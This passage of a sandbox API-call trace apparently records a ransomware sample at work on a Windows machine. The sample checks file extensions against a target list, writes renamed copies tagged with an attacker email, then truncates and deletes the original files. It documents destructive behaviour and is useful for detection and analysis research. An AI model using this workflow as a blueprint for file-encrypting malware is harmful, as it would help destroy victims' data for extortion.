lpString2=".wmv") returned 1 [0051.144] lstrlenW (lpString=".rar") returned 4 [0051.144] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.144] lstrlenW (lpString=".bz2") returned 4 [0051.144] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.145] lstrlenW (lpString=".7z") returned 3 [0051.145] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.145] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.145] lstrlenW (lpString=".dbf") returned 4 [0051.145] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.145] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.145] lstrlenW (lpString=".1cd") returned 4 [0051.145] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.145] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.145] lstrlenW (lpString=".jpg") returned 4 [0051.145] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.146] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.146] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.146] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.146] lstrlenW (lpString=".doc") returned 4 [0051.146] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString=".docx") returned 5 [0051.146] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.146] lstrlenW (lpString=".pdf") returned 4 [0051.146] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString=".xls") returned 4 [0051.146] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.146] lstrlenW (lpString=".xlsx") returned 5 [0051.146] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.146] lstrlenW (lpString=".ppt") returned 4 [0051.146] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.146] lstrlenW (lpString=".zip") returned 4 [0051.146] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.146] lstrlenW (lpString=".rar") returned 4 [0051.146] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString=".bz2") returned 4 [0051.146] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString=".7z") returned 3 [0051.146] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.146] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.146] lstrlenW (lpString=".dbf") returned 4 [0051.146] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.146] lstrlenW (lpString=".1cd") returned 4 [0051.146] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.146] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.146] lstrlenW (lpString=".jpg") returned 4 [0051.147] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.147] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.147] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.147] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.147] lstrlenW (lpString=".doc") returned 4 [0051.147] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.147] lstrlenW (lpString=".docx") returned 5 [0051.147] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.147] lstrlenW (lpString=".pdf") returned 4 [0051.147] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.147] lstrlenW (lpString=".xls") returned 4 [0051.147] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.147] lstrlenW (lpString=".xlsx") returned 5 [0051.147] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.147] lstrlenW (lpString=".ppt") returned 4 [0051.147] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.147] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.147] lstrlenW (lpString=".zip") returned 4 [0051.147] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.147] lstrlenW (lpString=".rar") returned 4 [0051.147] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.147] lstrlenW (lpString=".bz2") returned 4 [0051.147] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.148] lstrlenW (lpString=".7z") returned 3 [0051.148] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.148] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.148] lstrlenW (lpString=".dbf") returned 4 [0051.148] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.148] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.148] lstrlenW (lpString=".1cd") returned 4 [0051.148] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.148] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.148] lstrlenW (lpString=".jpg") returned 4 [0051.148] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.148] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.148] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.148] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.148] lstrlenW (lpString=".doc") returned 4 [0051.148] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.148] lstrlenW (lpString=".docx") returned 5 [0051.148] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.148] lstrlenW (lpString=".pdf") returned 4 [0051.148] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.148] lstrlenW (lpString=".xls") returned 4 [0051.148] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.148] lstrlenW (lpString=".xlsx") returned 5 [0051.148] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.148] lstrlenW (lpString=".ppt") returned 4 [0051.148] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.148] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.149] lstrlenW (lpString=".zip") returned 4 [0051.149] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.149] lstrlenW (lpString=".rar") returned 4 [0051.149] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.149] lstrlenW (lpString=".bz2") returned 4 [0051.149] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.149] lstrlenW (lpString=".7z") returned 3 [0051.149] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.149] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.149] lstrlenW (lpString=".dbf") returned 4 [0051.149] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.149] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.149] lstrlenW (lpString=".1cd") returned 4 [0051.149] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.149] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.149] lstrlenW (lpString=".jpg") returned 4 [0051.149] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.149] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.149] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.149] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.149] lstrlenW (lpString=".doc") returned 4 [0051.149] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.149] lstrlenW (lpString=".docx") returned 5 [0051.149] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.149] lstrlenW (lpString=".pdf") returned 4 [0051.149] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.150] lstrlenW (lpString=".xls") returned 4 [0051.150] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.150] lstrlenW (lpString=".xlsx") returned 5 [0051.150] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.150] lstrlenW (lpString=".ppt") returned 4 [0051.150] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.150] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.150] lstrlenW (lpString=".zip") returned 4 [0051.150] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.150] lstrlenW (lpString=".rar") returned 4 [0051.150] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.150] lstrlenW (lpString=".bz2") returned 4 [0051.150] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.150] lstrlenW (lpString=".7z") returned 3 [0051.150] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.150] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.150] lstrlenW (lpString=".dbf") returned 4 [0051.150] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.150] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.150] lstrlenW (lpString=".1cd") returned 4 [0051.150] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.150] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.150] lstrlenW (lpString=".jpg") returned 4 [0051.150] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.042] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0052.042] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0052.042] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0052.042] lstrlenW (lpString=".doc") returned 4 [0052.042] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0052.042] lstrlenW (lpString=".docx") returned 5 [0052.042] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0052.043] lstrlenW (lpString=".pdf") returned 4 [0052.043] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0052.043] lstrlenW (lpString=".xls") returned 4 [0052.043] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0052.043] lstrlenW (lpString=".xlsx") returned 5 [0052.043] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0052.043] lstrlenW (lpString=".ppt") returned 4 [0052.043] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0052.043] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0052.043] lstrlenW (lpString=".zip") returned 4 [0052.043] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0052.043] lstrlenW (lpString=".rar") returned 4 [0052.043] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0052.043] lstrlenW (lpString=".bz2") returned 4 [0052.043] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0052.043] lstrlenW (lpString=".7z") returned 3 [0052.043] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0052.043] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0052.043] lstrlenW (lpString=".dbf") returned 4 [0052.043] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0052.043] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0052.043] lstrlenW (lpString=".1cd") returned 4 [0052.043] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0052.043] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0052.043] lstrlenW (lpString=".jpg") returned 4 [0052.043] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.147] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=29790) returned 1 [0052.147] CloseHandle (hObject=0x228) returned 1 [0052.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 0x20 [0052.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.148] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.148] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.148] GetLastError () returned 0x0 [0052.148] ReadFile (in: hFile=0x228, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x745e, lpOverlapped=0x0) returned 1 [0052.150] WriteFile (in: hFile=0x1a0, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x7460, lpOverlapped=0x0) returned 1 [0052.151] ReadFile (in: hFile=0x228, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.151] WriteFile (in: hFile=0x1a0, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0052.151] SetEndOfFile (hFile=0x1a0) returned 1 [0052.151] CloseHandle (hObject=0x1a0) returned 1 [0052.152] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.152] SetEndOfFile (hFile=0x228) returned 1 [0052.152] CloseHandle (hObject=0x228) returned 1 [0052.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.153] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 1 [0052.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.153] lstrlenW (lpString=".doc") returned 4 [0052.153] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.153] lstrlenW (lpString=".docx") returned 5 [0052.153] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1 [0052.153] lstrlenW (lpString=".pdf") returned 4 [0052.153] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.153] lstrlenW (lpString=".xls") returned 4 [0052.153] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.153] lstrlenW (lpString=".xlsx") returned 5 [0052.153] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1 [0052.153] lstrlenW (lpString=".ppt") returned 4 [0052.153] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.153] lstrlenW (lpString=".zip") returned 4 [0052.153] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.153] lstrlenW (lpString=".rar") returned 4 [0052.153] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.153] lstrlenW (lpString=".bz2") returned 4 [0052.154] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.154] lstrlenW (lpString=".7z") returned 3 [0052.154] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.154] lstrlenW (lpString=".dbf") returned 4 [0052.154] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.154] lstrlenW (lpString=".1cd") returned 4 [0052.154] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.154] lstrlenW (lpString=".jpg") returned 4 [0052.154] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.156] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.177] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.211] GetLastError () returned 0x0 [0052.211] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1a1c, lpOverlapped=0x0) returned 1 [0052.238] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1a20, lpOverlapped=0x0) returned 1 [0052.239] ReadFile (in: hFile=0x220, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.239] WriteFile (in: hFile=0x210, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.239] SetEndOfFile (hFile=0x210) returned 1 [0052.239] CloseHandle (hObject=0x210) returned 1 [0052.239] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.239] SetEndOfFile (hFile=0x220) returned 1 [0052.240] CloseHandle (hObject=0x220) returned 1 [0052.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0052.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.241] lstrlenW (lpString=".doc") returned 4 [0052.241] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.241] lstrlenW (lpString=".docx") returned 5 [0052.241] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.241] lstrlenW (lpString=".pdf") returned 4 [0052.241] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.241] lstrlenW (lpString=".xls") returned 4 [0052.241] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.241] lstrlenW (lpString=".xlsx") returned 5 [0052.241] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.241] lstrlenW (lpString=".ppt") returned 4 [0052.241] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.241] lstrlenW (lpString=".zip") returned 4 [0052.241] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.241] lstrlenW (lpString=".rar") returned 4 [0052.241] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.241] lstrlenW (lpString=".bz2") returned 4 [0052.241] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.241] lstrlenW (lpString=".7z") returned 3 [0052.241] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.241] lstrlenW (lpString=".dbf") returned 4 [0052.241] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.241] lstrlenW (lpString=".1cd") returned 4 [0052.241] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 63 [0052.241] lstrlenW (lpString=".jpg") returned 4 [0052.241] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.242] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2596) returned 1 [0052.242] CloseHandle (hObject=0x220) returned 1 [0052.242] GetFileAttributesW (lpFileName="C:\\Program 